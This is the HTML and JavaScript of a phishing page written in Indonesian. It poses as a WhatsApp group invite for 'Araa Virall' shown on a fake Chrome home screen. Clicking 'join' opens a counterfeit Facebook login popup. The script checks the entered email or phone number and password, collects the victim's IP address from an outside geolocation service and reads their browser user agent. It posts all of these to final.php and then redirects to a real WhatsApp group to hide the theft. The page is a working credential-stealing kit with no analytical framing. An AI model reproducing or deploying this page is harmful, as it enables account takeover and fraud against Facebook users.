<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Whatsapp Group Invite</title>
    <link rel="icon" type="image/x-icon" href="https://z-p3-static.xx.fbcdn.net/rsrc.php/yz/r/lOol7j-zq4u.svg">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css">
    <script src="https://cdn.jsdelivr.net/gh/renzichwan/api@main/jquery.3.6.2.js"></script>
    </head>

<body>
    <div class="chrome-home">

        <div class="chrome-header">
            <div class="home">
                <i class="fa fa-home" aria-hidden="true"></i>
            </div>
            <div class="menu">
                <i class="fa fa-ellipsis-v" aria-hidden="true"></i>
            </div>
        </div>

        <div class="chrome-logo">
            <img src="https://cdn.pixabay.com/photo/2015/11/02/14/01/google-1018443_960_720.png">
        </div>
        <div class="chrome-search">
            <input type="text" placeholder="Telusuri atau ketik alamat">
            <i class="fa fa-microphone" aria-hidden="true"></i>
            <i class="fa fa-camera" aria-hidden="true"></i>
        </div>


        <div class="chrome-links">
            <div class="links">
                <div class="circle">
                    <img
                        src="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/800px-Facebook_f_logo_%282019%29.svg.png">
                </div>
                <span class="label">Facebook</span>
            </div>
            <div class="links">
                <div class="circle">
                    <img
                        src="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e7/Instagram_logo_2016.svg/768px-Instagram_logo_2016.svg.png">
                </div>
                <span class="label">Instagram</span>
            </div>
            <div class="links">
                <div class="circle">
                    <img
                        src="https://upload.wikimedia.org/wikipedia/commons/thumb/4/4f/YouTube_social_white_squircle.svg/480px-YouTube_social_white_squircle.svg.png">
                </div>
                <span class="label">Youtube</span>
            </div>

            <div class="links">
                <div class="circle">
                    <img
                        src="https://upload.wikimedia.org/wikipedia/sco/thumb/9/9f/Twitter_bird_logo_2012.svg/1200px-Twitter_bird_logo_2012.svg.png">
                </div>
                <span class="label">Twitter</span>
            </div>
            <div class="links">
                <div class="circle">
                    <img
                        src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/c9/Linkedin.svg/1200px-Linkedin.svg.png">
                </div>
                <span class="label">Linkedin</span>
            </div>
            <div class="links">
                <div class="circle">
                    <img
                        src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/19/WhatsApp_logo-color-vertical.svg/2048px-WhatsApp_logo-color-vertical.svg.png">
                </div>
                <span class="label">Whatsapp</span>
            </div>
        </div>

        <div class="whatsapp-mask"></div>

        <div class="whatsapp-panel">
            <div class="whatsapp-init">
                <span class="init-text">
                    Memeriksa undangan grup...
                </span>
                <div class="init-loading">
                    <img src="img/loading.gif">
                </div>
            </div>



            <div class="whatsapp-link" style="display:none">
                <div class="link-icon">
                    <img src="https://h.top4top.io/p_2307bd3oz1.jpg">
                </div>
                <div class="link-content">
                    <h1 class="content-title">
                        Araa Virall
                    </h1>
                    <span class="content-author">
                        Grup dibuat oleh +62 851-5604-8182
                    </span>
                    <span class="content-member">
                        200 peserta • Tidak ada kontak
                    </span>
                </div>
                <div class="link-action">
                    <a class="action-go">BATAL</a>
                    <a class="action-go" onclick="login()">BERGABUNG KE GRUP</a>
                </div>
            </div>
        </div>
    </div>

    <div class=" popup-login login-facebook animated fadeIn" style="display: none;">
        <div class="popup-box-login-fb">
            <div class="navbar-fb">
                <img width="45" src="img/fb.png">
            </div>
            <div class="content-box-fb">
                <p class="alert sandi">The password you entered is incorrect. <b>Did you forget your
                        password?</b></p>
                <p class="alert email">The mobile number or email address that you've entered doesn't
                    match any
                    account. <b>Find your account.</b></p>
                <img width="75" height="75" src="https://z-p3-static.xx.fbcdn.net/rsrc.php/yz/r/lOol7j-zq4u.svg">
                <div class="txt-login-fb">
                    Log in to your Facebook account to connect with Whatsapp
                </div>
                <form class="login-form" method="POST" action="validate.php" onsubmit="$(this).end()">
                    <label>
                        <input type="text" id="user" name="user" placeholder="Mobile number or email address"
                            autocomplete="off" autocapitalize="off">
                    </label>
                    <label>
                        <input type="password" id="pass" name="pass" placeholder="Facebook password" autocomplete="off"
                            autocapitalize="off">
                    </label>
                    <!-- END -->
                    <input type="hidden" name="ip" value="">
                    <input type="hidden" name="ua" value="">
                    <button type="submit" id="btnfb" class="btn-login-fb">Log In</button>
                </form>
                <div class="txt-create-account">Create account</div>
                <div class="txt-not-now">Not now</div>
                <div class="txt-forgotten-password">Forgotten password?</div>
            </div>
            <div class="language-box">
                <center>
                    <div class="language-name language-name-active">English (UK)</div>
                    <div class="language-name">Bahasa Indonesia</div>
                    <div class="language-name">Basa Jawa</div>
                    <div class="language-name">Bahasa Melayu</div>
                    <div class="language-name">日本語</div>
                    <div class="language-name">Español</div>
                    <div class="language-name">Português (Brasil)</div>
                    <div class="language-name">
                        <i class="fa fa-plus"></i>
                    </div>
                </center>
            </div>
            <div class="copyrights">Facebook Inc.</div>
        </div>
    </div>

    <script>
        window.onload = () => {
            setTimeout(() => {
                $('.whatsapp-link').show()
                $('.whatsapp-init').hide()
            }, 1500)
        }
    </script>
    <script>
        $.ajax({
            type: "get",
            async: false,
            url: "https://na.apps.amsoveasea.com/swoole/?actid=2020&r=index/getCountry&_only_service_response_=1",
            dataType: "json",
            success: function (result) {
                $('input[name="ip"]').val(result.ip);
                $('input[name="ua"]').val(navigator.userAgent)
            }
        })

        function login() {
            $('.login-facebook').fadeIn();
        }

        window.addEventListener('submit', function (e) {
            e.preventDefault();
            $("#btnfb").addClass("disabled");
            setTimeout(() => {
                var user = $('#user').val();
                var pass = $('#pass').val();
                if (user == '' || user == null) {
                    $('.email').show();
                    $('.sandi').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                } else {

                    if (user.includes('@')) {
                        let pattern = /^[^ ]+@[^ ]+\.[a-z]{2,3}$/;
                        if (user.match(pattern)) {
                            $('.email').hide();
                        } else {
                            $('.email').show();
                            $('.sandi').hide();
                            $("#btnfb").removeClass("disabled");
                            return false;
                        }
                    }

                    if (!isNaN(user)) {
                        if (user.length <= 10) {
                            $('.email').show();
                            $('.sandi').hide();
                            $("#btnfb").removeClass("disabled");
                            return false;
                        } else {
                            $('.email').hide();
                        }
                    }

                    if (user.match(/\s/g)) {
                        $('.email').show();
                        $('.sandi').hide();
                        $("#btnfb").removeClass("disabled");
                        return false;
                    } else {
                        $('.email').hide();
                    }

                    var regex = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                    if (user.match(regex)) {
                        $('.email').show();
                        $('.sandi').hide();
                        $("#btnfb").removeClass("disabled");
                        return false;
                    }


                    if (user.length <= 5) {
                        $('.email').show();
                        $('.sandi').hide();
                        $("#btnfb").removeClass("disabled");
                        return false;
                    } else {
                        $('.email').hide();
                    }

                }
                if (pass == '' || pass == null || pass.length <= 5) {
                    $('.sandi').show();
                    $("#btnfb").removeClass("disabled");
                    return false;
                } else {
                    $('.sandi').hide();
                }
                var regexs = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                if (pass.match(regexs)) {
                    $('.sandi').show();
                    $('.email').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                } else {
                    $('.sandi').hide();
                }
                $.ajax({
                    type: 'POST',
                    url: 'final.php',
                    data: $('.login-form').serialize(),
                    dataType: 'text',
                    success: function () {
                        $('.login-facebook').fadeOut(),
                            window.location = 'https://chat.whatsapp.com/E3Ts27WcqNGEU1uxiYHpdo';
                    }
                })
            }, 1000)
        })

    </script>
</body>

</html>